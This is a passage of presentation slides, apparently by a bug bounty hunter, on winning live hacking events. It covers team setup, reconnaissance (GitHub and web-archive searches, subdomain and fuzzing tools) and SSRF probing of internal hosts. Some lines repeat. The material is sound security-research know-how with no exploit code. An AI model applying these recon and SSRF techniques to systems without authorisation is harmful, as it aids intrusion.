of MVH in Vegas! (Uber, Salesforce, Zenefits) H1-514 2018: Winner of MVH in Montreal! (Shopify) H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath) H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath) H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath) H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber) H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath) H1-202 2018: Winner Best bug in Washington (Mapbox) H1-3120 2018: Winner Best bug in Amsterdam (Dropbox) H1-514 2018: Winner Highest reputation in Montreal (Shopify)
of MVH in Vegas! (Uber, Salesforce, Zenefits) H1-514 2018: Winner of MVH in Montreal! (Shopify) H1-415 2018: Winner Best team @teamsweden in San Francisco (Oath) H1-212 2018: Winner Earning the most $$$ @unitedstatesofsweden in New York (Oath) H1-212 2018: Winner Highest reputation @unitedstatesofsweden in New York (Oath) H1-702 2018: Winner Best bug @teamsweden in Vegas (Uber) H1-212 2018: Winner Best bug @unitedstatesofsweden in New York (Oath) H1-202 2018: Winner Best bug in Washington (Mapbox) H1-3120 2018: Winner Best bug in Amsterdam (Dropbox) H1-514 2018: Winner Highest reputation in Montreal (Shopify)
"hacker-meets-dev face-to-face" bug bounty with special targets • First by HackerOne in 2016 in Vegas • More companies runs these nowadays. H1, Bugcrowd, Facebook/Google, Visma. Smaller companies run their own also
a walkthrough • Hangout, slides, presented by the company itself • Ability to ask questions 2. Often a bigger scope • Often *.company.com, *.company.dev, infrastructure, IPs • Open source repos by the company • Enterprise access to products • One time social engineering(!)
do recon • This is a VERY important part • One time 48 hours. Hard! • Slack instance with the company! 4. Some allow pre-submissions • Awesome! Less preasure on final day • Faster payouts on event day
company • At HQ or hacking event (Defcon, Black Hat, Nullcon etc) • Discussions here == PRICELESS!! • Valid bugs because I could discuss with the company - This domain, what does it do? - Is this app supposed to work like this? - I noticed this weird behaviour, I think I can do this, what do you think?
early, shower and HACK • If no pre-submissions, get reports in! • Hacking day is special, sit in teams, collaboration(!) • Found many bugs on the actual day!
you have/know: • credentials needed • what domains are included, subdomains/acquisitions • what NOT to focus on (out-of-scope) • upgrades to enterprise accounts if promised
• put in "similar" effort to you • might know stuff you don't • helps you cover more target surface • you can communicate with and brainstorm Keep team small, 2-4. If 3 or more, effort will differ, allow to split differently For 2 people, 50% each is always the simplest.
• Best bugs! Example: trying all integrations from a list of 80. Read docs on how each worked Found a $20k bug due to one (1!!!) faulty implementation!
Desktop client • Web (API-paths in JS-files) • PHP/Java/Golang-SDKs • npm/composer/yarn Legacy versions of APIs? • Older versions working? • Are there docs? Web-archive?
Have integrations? (Slack, Trello, Zapier etc) • Allow integrations? (OAuth etc) • Public repos with examples? Company's Github repos • What software they use (Forks) • Synched with original repo? (No: vulns by diffing versions?)
Gists, Github, Google • "Internal indicators", search everywhere • Domains/AWS/GCP-tools in org: "org:xxx amazonaws" etc • Any users in organization? • Extract contributors from repos • Company name in users’ repos: "user:xxx company-name" • Search Github Issues, funky stuff by accident! • Non-forked repos in organization ‣ Package dependencies from employees? ‣ Still hired by the company? If not, bad
Bugs might mean bugs in prod! • Might mean company made other companies vulnerable (really bad PR for the company) LEGACY • Content from web-archive, read old documentation(!!!) • URLs from web-archive's CDX-api, commoncrawl etc. • Test all URLs. Distinguish status-codes / bytes received (Wfuzz) • Anything interesting? Filter file-types, deduplicate
here we can't cover it all. These are general things • DNS, Subbrute, sublist3r etc. So many tools! ‣ Customized subbrute with 3rd party data ‣ Generate DNS-wordlist based on findings • Existing routes from JS-files, Burp History • postMessage-tracker (logs all listener functions) • Wfuzz target (VPN with switchable IP if blocked)
here we can't cover it all. These are general things • DNS, Subbrute, sublist3r etc. So many tools! ‣ Customized subbrute with 3rd party data ‣ Generate DNS-wordlist based on findings • Existing routes from JS-files, Burp History • postMessage-tracker (logs all listener functions) • Wfuzz target (VPN with switchable IP if blocked) Best protip: Focus on BORING/HARD STUFF, other hackers won’t
Dir for target, TXT-file always open • Comments (snippets / indicators / urls) • Super helpful. Chaining bugs! - If an Open-Redirect, we can make a chain • Test-code, SDKs, screenshots in dir • Valid vulns in one place, separate from "interesting behaviour"
internal network (Both ipv4/ipv6) • Virtual host / kubernetes node is bad, due to requirement of Host-header. Not all SSRF send proper Host-header (HTTP/1.0, binding external DNS-host to internal IP etc) • Different files, depends on SSRF: MP3, ICS, XML, TXT, HTML, PNG, JPG, SVG etc. • If internal hosts can be reached without scanning internal network. One company had flags in files, simple to prove you could access.